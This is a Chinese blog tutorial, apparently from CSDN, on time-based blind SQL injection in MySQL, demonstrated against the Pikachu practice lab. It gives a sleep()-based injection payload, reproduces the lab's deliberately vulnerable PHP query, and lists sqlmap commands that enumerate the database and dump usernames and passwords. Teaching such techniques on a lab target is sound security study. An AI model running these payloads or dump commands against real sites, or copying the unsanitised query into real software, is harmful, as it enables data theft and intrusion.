SQL 注入漏洞(八)时间注入/延时注入

已于 2022-06-18 00:23:46 修改
阅读量4.5k 收藏 11
点赞数 1
分类专栏: OWASP TOP10 文章标签: mysql web安全
于 2022-06-12 20:12:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51730169/article/details/125248139
版权

一、时间注入

时间注入又名延时注入,属于盲注入的一种,通常是某个注入点无法通过布尔型注入获取数据,而采用一种突破注入的技巧。
在 mysql 里 函数 sleep() 是延时的意思,sleep(10)就是数据库延时 10 秒返回内容。判断注入可以使用' and sleep(10),数据
库延时10秒返回值,网页响应时间至少要10秒,根据这个原理来判断存在 SQL 时间注入。
mysql 延时注入用到的函数 sleep() 、if()、substring()
select if(2>1,sleep(10),0),2>1这个部分就是你注入要构造的 SQL 语句。
select if(length(database())>1,sleep(5),0),这个就是查询当前库大于1,就会延时5秒执行。
vince' and if(length(database())>1,sleep(5),0)--+
可以看到网页是大于五秒返回。根据这个原理 n>1,n不延时就能确定当前数据库的长度了。

在这里插入图片描述

如果想要获取数据内容,可以用截取字符再进行字符对比,如果相同就进行延时。这样就能获取字符,接着再拼接就是当前库的内容。

二、代码分析

在页面中分析源码,直接获取 name 带进数据库进行查询,但是是否存在记录页面返回都一样。

$link=connect();
$html='';

if(isset($_GET['submit']) && $_GET['name']!=null){
    //这里没有做任何处理,直接拼到select里面去了
    $name=$_GET['name'];
    //这里的变量是字符型,需要考虑闭合
    $query="select id,email from member where username='$name'";
    $result=execute($link, $query);
    if(mysqli_num_rows($result)>=1){
        while($data=mysqli_fetch_assoc($result)){
            $id=$data['id'];
            $email=$data['email'];
            $html.="<p class='notice'>your uid:{$id} <br />your email is: {$email}</p>";
        }
    }else{

        $html.="<p class='notice'>您输入的username不存在,请重新输入!</p>";
    }
}

三、sqlmap测时间注入

在黑盒模式下可以使用 sqlmap 对注入检测。sqlmap 支持多种数据库注入,而且支持多种注入方式。

在这里插入图片描述

1、基本使用

采用时间注入:
sqlmap -u "http://192.168.1.40/06/vul/sqli/sqli_str.php?name=vince&submit=1" -p name -v 1 --technique=T
-u 表示检测的 url
-p 指定的检测参数
-v 显示调试模式
--technique=T 检测方法为时间注入

在这里插入图片描述

2、获取用户和数据库名

sqlmap 检测为时间注入,通过这个注入获取数据库名、用户权限、表、字段等敏感信息。
sqlmap -u "http://192.168.1.40/06/vul/sqli/sqli_str.php?name=vince&submit=1" -p name -v 1 --technique=T --current-user --current-db --batch
--current-user 获取用户
--current-db 当前库
--batch 使用默认模式,自动 y

在这里插入图片描述在这里插入图片描述

3、获取表

-D 指定数据库
--tables 获取表
sqlmap -u "http://192.168.1.40/06/vul/sqli/sqli_str.php?name=vince&submit=1" -p name -v 1 --technique=T --tables -D pikachu --batch

在这里插入图片描述在这里插入图片描述

4、获取字段

-T 指定表
--columns 获取字段
sqlmap -u "http://192.168.1.40/06/vul/sqli/sqli_str.php?name=vince&submit=1" -p name -v 1 --technique=T --columns -T users -D pikachu --batch

在这里插入图片描述在这里插入图片描述

5、查询账号和密码

--dump 导出数据
-C 指定查询的字段
sqlmap -u "http://192.168.1.40/06/vul/sqli/sqli_str.php?name=vince&submit=1" -p name -v 1 --technique=T --dump -C "id,username,password" -T users -D pikachu --batch

在这里插入图片描述在这里插入图片描述在这里插入图片描述

Aτθ
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Web安全SQL注入时间盲注原理+步骤+实战操作
wangyuxiang946的博客
05-21 2218
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 4829
1.概念 1.延时注入:当进行盲注的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
SQL注入-时间盲注
最新发布
WolvenSec的博客
06-03 1717
SQL时间盲注(Time-based Blind SQL Injection),又叫延时注入,是一种SQL注入攻击技术,用于在无法直接获取查询结果或查看响应内容变化的情况下,通过引入时间延迟来推断数据库的信息;时间盲注依赖于数据库执行查询时的时间延迟,通过观察响应时间的变化,攻击者可以推测出查询结果。这里以Sqli-Labs靶场的Less-9关卡为例子来阐述时间盲注的具体思路:进入关卡首先构建参数id。
SQL注入延时注入
热门推荐
秋水的博客
09-01 2万+
延时注入简介 个人理解: 延时注入又称时间盲注,也是盲注的一种。通过构造延时注入语句后,浏览器页面的响应时间来判断正确的数据/ 应用场景: 延时注入的应用场景是,在我们输入and 1或者and 0的时候,页面的返回无变化,这个时候可以通过and sleep(5)来判断一下页面的响应时间,相应时间在五秒多一点的话,说明此处可以使用延时注入 相关函数 延时注入会用到布尔盲注的所有...
sql注入-延时注入】sleep()、benchmark()函数 延时注入
07-10 7139
延时注入】结合if、case when 延时注入
MySQL延时盲注
一个普普通通的博客
03-01 1466
Mysql延时盲注
延时注入exp编写
yyj1781572的博客
11-02 264
延时注入也是盲注入的一种,是利用sql语句达到延时的目的,在mysql中用的sleep()函数,select sleep(3)数据库延时3秒返回信息。利用这个函数加上if函数进行判断,就可以达到延时注入注入得出数据。
自己动手编写SQL注入漏洞扫描器C#源代码
03-16
本主题将深入探讨如何使用C#编程语言编写一个SQL注入漏洞扫描器,旨在帮助开发者理解和预防这类威胁。 首先,我们需要理解SQL注入的基本概念。SQL注入是攻击者通过输入恶意的SQL代码,欺骗数据库服务器执行非预期的...
SQL.rar_sql injection_sql 注入_sql注入
09-14
在"SQL.rar"中,我们看到与SQL注入相关的资源,包括一个名为"SQL.cpp"的C++源代码文件,这可能是用于模拟或测试SQL注入漏洞的程序。 SQL注入攻击的基本原理是利用用户输入的数据直接拼接到SQL查询中,如果输入未经...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库...SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入时间注入)等...
SQL住入原始脚本_SQL注入python脚本_
10-03
SQLmap是一个自动化工具,专门用于检测和利用SQL注入漏洞。它支持多种数据库类型,包括MySQL、PostgreSQL、Oracle等,并且可以执行各种类型的SQL注入攻击。在提供的压缩文件中,`less14_exp.py`, `less9_exp.py`, `...
sql注入的思维导图。
04-19
SQL注入是一种常见的Web应用程序安全漏洞, attackers可以通过在Web应用程序的输入字段中Inject恶意的SQL代码来访问、修改或控制数据库中的数据。本文将对SQL注入的思维导图进行详细的讲解,并对相关的知识点进行...
sql注入——延时注入
qq_52843411的博客
08-23 1004
无论我们怎样变化,或者改变闭合,都无法是页面做出不同的回显,我们有理由相信他为一个静态页面,当然,作为一个练习,这个肯定是有漏洞的,我们可以通过页面相应的时间来做出判断,我们可以通过sleep()函数,来使页面进行延迟响应。我们对页面进行了延时,导致页面的响应时间比正常情况下都要慢五秒钟,我们可以通过对响应时间的长短,来判断真假,要判断真假,就要用到我们的if函数。)第一个字段为判读语句,第二个字段为判断为真时执行的语句,第三个字段为判断为假时执行的语句。我们可知第一个字符ASCII为53,即5。
Sqlmap详细使用教程
qq_47177909的博客
03-23 1899
sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过带外数据连接的方式执行操作系统命令。NOTE] 链接。
SQL注入时间延迟型注入
DM766924的博客
09-16 1518
时间延迟型注入 原理:利用if函数,执行判断; 如果正确,直接返回(时间很短,网速有一定影响) 如果不正确,执行时间延迟,常用的函数有sleep和benchmark 以上操作也可以反过来。适用环境:界面无法用布尔真假判断,也无法报错注入的情况下。 时间延迟注入常用SQL函数介绍 if(condition,expr1,expr2)功能:如果condition是true,则if()的返回值是expr1,否则返回值则为expr2,if()的返回值为数字值或字符串,具体情况视其所在语境而定举例:select
MySQL注入秘籍【上篇】
大河之犬的博客
03-21 939
通常使用联合查询注入法,其作用就是,在原来查询条件的基础上,通过关键字union、union all拼接恶意SQL语句,union后面的select得到的结果将拼接到前个select的结果的后面。既然已经知道了查询列数了,那我们就需要判断哪些列的内容是可以显示到前端的,因为能显示到前端的字段,我们在利用时也能直接显示我们想要的数据。报错原理:e的x次方到x每增加1,其结果都将跨度极大,而mysql能记录的double数值范围有限,一旦结果超过范围,则该函数报错。直接查询数据库,不需要判断字段数、显位等;
Wireshark数据包分析——时间盲注/延时注入攻击
PP_zi的博客
08-23 1922
盲注:在SQL注入时,SQL语句执行查询后,查询的数据不回显到页面,需要用一些特殊的方式来判断或者尝试,这个过程称为盲注。
mysql时间 注入 sleep_SQL注入进阶
weixin_29442195的博客
01-28 1061
原标题:SQL注入进阶 1、时间注入攻击时间注入攻击的测试地址:http://ccctf.cn/sql/time/time.php?id=1。访问该网址时,页面返回yes,在网址的后面加上一个单引号,再次访问,页面返回no。这个结果与Boolean注入非常相似,下面介绍遇到这种情况时的另外一种注入方法——时间盲注。它与Boolean注入的不同之处在于,时间注入是利用sleep或benchmark等...
sqlmap 注入技术参数
白菜执笔人的博客
02-26 6157
Web安全攻防 学习笔记 一、Sqlmap 注入技术参数 1.1、sqlmap 设置具体 SQL 注入技术         参数 --technique 用于指定检测注入时所用技术。默认情况下 Sqlmap 会使用自己支持的全部技术进行检测。 此参数后跟表示检测技术的大写字母,其值为 B、E、U、S、T 或 Q,含义如下: B:Boolean-ba...
cfthub sql注入 时间注入
07-15
你好,C知道在这里!关于CFTHub和SQL注入,我可以为你提供一些基本的信息。 CFTHub是一个开源的漏洞扫描和渗透测试工具,它可以帮助安全专家识别和修复应用程序中的安全漏洞SQL注入是一种常见的网络攻击方式,它利用应用程序对用户输入的处理不当,从而在数据库查询中插入恶意的SQL代码。这可能导致数据库被非法访问、数据泄露甚至应用程序的完全控制。 时间注入(Time-based Injection)是SQL注入的一种形式,它利用延时函数或时间相关操作来确认SQL查询是否成功执行。攻击者可以利用时间注入来获取敏感信息或以其他方式干扰应用程序的正常运行。 要防止SQL注入时间注入攻击,可以采取以下措施: 1. 使用参数化查询或预编译语句来防止用户输入直接插入到SQL查询中。 2. 对用户输入进行严格的验证和过滤,确保只允许预期的数据类型和格式。 3. 限制应用程序对数据库的权限,确保只有必要的操作被执行。 4. 定期更新和维护应用程序和数据库,以修补已知的安全漏洞。 希望这些信息对你有所帮助!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值